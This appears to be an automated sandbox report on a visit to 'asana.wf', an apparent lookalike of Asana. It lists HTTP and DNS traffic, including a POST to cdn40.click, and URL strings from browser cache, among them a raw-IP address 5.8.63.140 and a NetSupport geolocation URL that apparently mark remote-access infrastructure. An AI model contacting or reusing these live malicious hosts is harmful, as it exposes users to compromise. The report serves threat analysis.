          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTU2NzkxNDA1NjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTkzLjQ0Ng==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTMxOTA2MjY1MTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTk4LjQ0NA==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTQ4MzM5MDg5NTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc1MDAzLjQ0OA==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTMzMzgzNDk0NTktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc1MDA4LjQ1Mg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTUwNzcwMjU1MTQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc1MDEzLjQ0MQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: asana.wfConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: chromecache_206.1.drString found in binary or memory: DF_Mk([DF_Ms({type:Boolean,K:!0}),DF_Ml("design:type",Object)],DF_Mkg.prototype,"isBot",void 0);DF_Mk([DF_Ms(),DF_Ml("design:type",Object)],DF_Mkg.prototype,"screenReaderTextKey",void 0);DF_Mkg=DF_Mk([DF_Mp("df-text-message"),DF_Ml("design:paramtypes",[String,String])],DF_Mkg);var DF_Mlg=DF_Mq([":host(:only-child) .wrapper{padding:var(--df-messenger-video-inner-padding,0)}:host(:not(.markdown):not(:only-child)) .embed,:host(:not(:only-child)) .link,:host(:not(:only-child)) .video{border:var(--df-messenger-video-inner-border,none);border-radius:var(--df-messenger-video-inner-border-radius,0);overflow:hidden}:host(:not(:only-child)) .wrapper{padding:var(--df-messenger-card-padding,16px)}:host(.markdown) .wrapper{display:inline-block;padding:var(--df-messenger-card-padding,16px);padding-left:0;padding-right:0}:host(.markdown:first-child) .wrapper{padding-top:0}:host(.markdown:last-child) .wrapper{padding-bottom:0}:host(.markdown) .embed,:host(:not(:only-child)) .embed,:host(:not(:only-child)) .link,:host(:not(:only-child)) .video{border:var(--df-messenger-video-inner-border,var(--df-messenger-video-border,var(--df-messenger-default-border)\n )\n );border-radius:var(--df-messenger-video-inner-border-radius,var(--df-messenger-video-border-radius,var(--df-messenger-default-border-radius)\n )\n );overflow:hidden}.link{display:inline-block;position:relative;text-decoration:none}.thumbnail,video{height:var(--df-messenger-video-height,auto);width:var(--df-messenger-video-width,auto)}.thumbnail,iframe,video{display:block;max-width:100%}iframe{height:var(--df-messenger-video-embed-height,var(--df-messenger-video-height,315px)\n );width:var(--df-messenger-video-embed-width,var(--df-messenger-video-width,560px)\n )}.title{align-items:center;color:var(--df-messenger-font-color,var(--df-messenger-default-font-color)\n );display:flex;font-family:var(--df-messenger-font-family,var(--df-messenger-default-font-family)\n );font-size:var(--df-messenger-font-size,var(--df-messenger-default-font-size)\n );padding:12px 16px}.youtube svg{height:24px;margin-right:8px;width:24px}.play{background:#000;border-radius:999px;height:36px;left:50%;opacity:.8;padding:8px;pointer-events:none;position:absolute;top:50%;transform:translate(-50%,-50%);width:36px}.play svg{fill:#fff;height:inherit;width:inherit}"]);function DF_Mmg(a){var b,c=null!=(b=a.anchor)?b:a.actionLink?{href:a.actionLink}:null;return c?new DF_Mng(c):null}function DF_Mog(a){var b,c=null!=(b=a.anchor)?b:a.actionLink?{href:a.actionLink}:null;return c?new DF_Mng(c):null}function DF_Mng(a){this.href=(null==a?void 0:a.href)||"";this.target=(null==a?void 0:a.target)||"_blank";this.rel=(null==a?void 0:a.rel)||"noopener noreferrer"};var DF_Mpg=DF_Mc([' <div class="wrapper">\n <div class="video">\n <video src="','" controls>',"</video>\n ","\n </div>\n </div>"]),DF_Mqg=DF_Mc(["https://www.youtube.com/embed"]),DF_Mrg=DF_Mc([' <div class="wrapper">\n <d
          Source: chromecache_309.1.dr, chromecache_322.1.dr, chromecache_211.1.drString found in binary or memory: return b}yC.J="internal.enableAutoEventOnTimer";var dc=ka(["data-gtm-yt-inspected-"]),AC=["www.youtube.com","www.youtube-nocookie.com"],BC,CC=!1; equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: asana.wf
          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
          Source: global trafficDNS traffic detected: DNS query: cdn40.click
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: virustotal.com
          Source: global trafficDNS traffic detected: DNS query: www.virustotal.com
          Source: global trafficDNS traffic detected: DNS query: www.recaptcha.net
          Source: global trafficDNS traffic detected: DNS query: recaptcha.net
          Source: unknownHTTP traffic detected: POST /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1Host: cdn40.clickConnection: keep-aliveContent-Length: 252sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://asana.wfSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://asana.wf/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 19:54:57 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 271Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Apr 2024 19:54:59 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 271Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: chromecache_289.1.dr, chromecache_343.1.drString found in binary or memory: http://5.8.63.140/fakeurl.htm
          Source: chromecache_289.1.dr, chromecache_343.1.drString found in binary or memory: http://5.8.63.140:443/fakeurl.htm
          Source: chromecache_286.1.drString found in binary or memory: http://asana.com/resources/anatomy-of-work
          Source: chromecache_264.1.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
          Source: chromecache_205.1.dr, chromecache_170.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crt
          Source: chromecache_343.1.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
          Source: chromecache_264.1.drString found in binary or memory: http://crl.globalsign.com/gs/gsextendvalsha2g3r3.crl
          Source: chromecache_343.1.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0#
          Source: chromecache_264.1.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl
          Source: chromecache_205.1.dr, chromecache_170.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl
          Source: chromecache_264.1.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl
          Source: chromecache_205.1.dr, chromecache_170.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl
          Source: chromecache_264.1.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl
          Source: chromecache_205.1.dr, chromecache_170.1.drString found in binary or memory: http://datatracker.ietf.org/doc/rfc5771
          Source: chromecache_343.1.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
          Source: chromecache_205.1.dr, chromecache_170.1.dr, chromecache_264.1.drString found in binary or memory: http://ocsp.digicert.com
          Source: chromecache_343.1.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
          Source: chromecache_343.1.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
          Source: chromecache_264.1.drString found in binary or memory: http://ocsp.pki.goog/gts1c3
          Source: chromecache_264.1.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendvalsha2g3r3
          Source: chromecache_264.1.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der
          Source: chromecache_170.1.dr, chromecache_264.1.drString found in binary or memory: http://r3.i.lencr.org/
          Source: chromecache_170.1.dr, chromecache_264.1.drString found in binary or memory: http://r3.o.lencr.org
          Source: chromecache_264.1.drString found in binary or memory: http://registrar.amazon.com
          Source: chromecache_343.1.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
          Source: chromecache_264.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendvalsha2g3r3.crt
          Source: chromecache_343.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
          Source: chromecache_205.1.dr, chromecache_170.1.drString found in binary or memory: http://support.google.com/legal
          Source: chromecache_170.1.drString found in binary or memory: http://wq.apnic.net/apnic-bin/whois.pl
          Source: chromecache_170.1.drString found in binary or memory: http://wq.apnic.net/whois-search/static/search.html
          Source: chromecache_264.1.drString found in binary or memory: http://www.EuroDNS.com
          Source: chromecache_170.1.drString found in binary or memory: http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
          Source: chromecache_264.1.drString found in binary or memory: http://www.cloudflare.com
          Source: chromecache_264.1.drString found in binary or memory: http://www.eurodns.com
          Source: chromecache_289.1.dr, chromecache_343.1.drString found in binary or memory: http://www.gstatic.com/generate_204
          Source: chromecache_205.1.dr, chromecache_170.1.drString found in binary or memory: http://www.iana.org/assignments/multicast-addresses
          Source: chromecache_264.1.drString found in binary or memory: http://www.icann.org/epp#clientTransferProhibited
          Source: chromecache_264.1.drString found in binary or memory: http://www.markmonitor.com
          Source: chromecache_205.1.drString found in binary or memory: http://www.ripe.net/whois
          Source: chromecache_206.1.drString found in binary or memory: https://accounts.google.com/gsi/client
          Source: chromecache_322.1.dr, chromecache_211.1.drString found in binary or memory: https://adservice.google.com/pagead/regclk
          Source: chromecache_322.1.dr, chromecache_211.1.drString found in binary or memory: https://adservice.googlesyndication.com/pagead/regclk
          Source: chromecache_182.1.drString found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
          Source: chromecache_286.1.drString found in binary or memory: https://api.ipify.org?format=json
          Source: chromecache_205.1.drString found in binary or memory: https://apps.db.ripe.net/search/query.html
          Source: chromecache_343.1.drString found in binary or memory: https://asana.com/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/tactics/TA0002/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/tactics/TA0004/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/tactics/TA0005/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/tactics/TA0006/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/tactics/TA0007/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/tactics/TA0009/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/tactics/TA0011/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1012/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1033/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1036/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1056/
          Source: chromecache_209.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1059)
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1059/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1059/001/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1064/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1071/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1082/
          Source: chromecache_209.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1082/))
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1106/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1112/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1129/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1497/
          Source: chromecache_209.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1498/))
          Source: chromecache_209.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1499/))
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1518/001/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1539/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1548/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1560/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1562/001/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1564/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1564/001/
          Source: chromecache_209.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1564/001/))
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1564/004/
          Source: chromecache_349.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1573/
          Source: chromecache_209.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1622/))
          Source: chromecache_209.1.drString found in binary or memory: https://attack.mitre.org/techniques/T1623))
          Source: chromecache_309.1.dr, chromecache_322.1.dr, chromecache_211.1.drString found in binary or memory: https://cct.google/taggy/agent.js
          Source: chromecache_286.1.drString found in binary or memory: https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95
          Source: chromecache_242.1.dr, chromecache_301.1.drString found in binary or memory: https://cdn46.space/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshd
          Source: chromecache_343.1.drString found in binary or memory: https://clients2.google.com/cr/report
          Source: chromecache_267.1.dr, chromecache_308.1.drString found in binary or memory: https://cloud.google.com/contact
          Source: chromecache_267.1.dr, chromecache_308.1.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
          Source: chromecache_206.1.drString found in binary or memory: https://cloud.google.com/terms/service-terms
          Source: chromecache_206.1.drString found in binary or memory: https://d30y9cdsu7xlg0.cloudfront.net/png/29715-200.png
          Source: chromecache_267.1.dr, chromecache_308.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
          Source: chromecache_267.1.dr, chromecache_308.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
          Source: chromecache_267.1.dr, chromecache_308.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
          Source: chromecache_206.1.drString found in binary or memory: https://dialogflow.cloud.google.com/v1/cx/integrations/messenger/webhook
          Source: chromecache_206.1.drString found in binary or memory: https://dialogflow.cloud.google.com/v1/cx/locations/
          Source: chromecache_206.1.drString found in binary or memory: https://dialogflow.googleapis.com/v3
          Source: chromecache_219.1.drString found in binary or memory: https://fonts.google.com/license/googlerestricted
          Source: chromecache_206.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
          Source: chromecache_206.1.drString found in binary or memory: https://fonts.googleapis.com/icon?family=Material
          Source: chromecache_219.1.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v59/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RF
          Source: chromecache_206.1.drString found in binary or memory: https://fonts.gstatic.com/s/i/short-term/release/googlesymbols/cloud_download/default/24px.svg
          Source: chromecache_232.1.drString found in binary or memory: https://fonts.gstatic.com/s/materialicons/v142/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2)
          Source: chromecache_336.1.dr, chromecache_241.1.dr, chromecache_296.1.drString found in binary or memory: https://github.com/InQuest/yara-rules-vt
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/anti-behavioral-analysis/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/anti-behavioral-analysis/debugger-detection.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/anti-behavioral-analysis/debugger-detection.md#
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/anti-behavioral-analysis/debugger-evasion.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/anti-behavioral-analysis/debugger-evasion.md#me
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/command-and-control/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/command-and-control/ingress-tool-transfer.md))
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/defense-evasion/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/defense-evasion/hidden-files-and-directories.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/discovery/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/discovery/system-information-discovery.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/execution/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/execution/command-and-scripting-interpreter.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/execution/install-additional-program.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/impact/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/impact/denial-of-service.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/communication/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/communication/http-communicatio
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/communication/wininet.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/communication/wininet.md#method
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/file-system/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/file-system/create-file.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/file-system/read-file.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/memory/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/memory/change-memory-protection
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/operating-system/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/operating-system/registry.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/process/README.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/process/terminate-process.md
          Source: chromecache_209.1.drString found in binary or memory: https://github.com/MBCProject/mbc-markdown/blob/main/persistence/README.md
          Source: chromecache_206.1.drString found in binary or memory: https://github.com/chjj/)
          Source: chromecache_206.1.drString found in binary or memory: https://github.com/markedjs/marked.
          Source: chromecache_206.1.drString found in binary or memory: https://google.com
          Source: chromecache_264.1.drString found in binary or memory: https://icann.org/epp#clientDeleteProhibited
